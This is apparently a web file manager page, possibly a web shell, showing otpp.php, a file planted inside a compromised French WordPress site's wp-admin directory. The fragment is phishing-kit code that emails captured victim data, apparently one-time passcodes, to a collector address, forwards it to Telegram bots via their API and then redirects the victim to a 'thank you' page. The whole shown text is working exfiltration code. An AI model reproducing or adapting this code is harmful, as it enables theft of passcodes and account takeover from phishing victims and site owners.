芝麻web文件管理V1.00
编辑当前文件:/home/prismawe/clients/gerard-philippe-peinture.fr/wp-admin/fr/am/infoz/otpp.php
"; mail($rezmail,$Subject,$message,$head); } $theip = $message; function antiBotsCaller($messaggio,$bot_token,$rez_chat) { $url = "https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $rez_chat; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url,CURLOPT_RETURNTRANSFER => true);curl_setopt_array($ch, $optArray);$result = curl_exec($ch);curl_close($ch);return $result;}antiBotsCaller($theip,$antit2,$antic1);antiBotsCaller($message,$bot_token,$rez_chat); } header('Location: ../merci.php'); ?>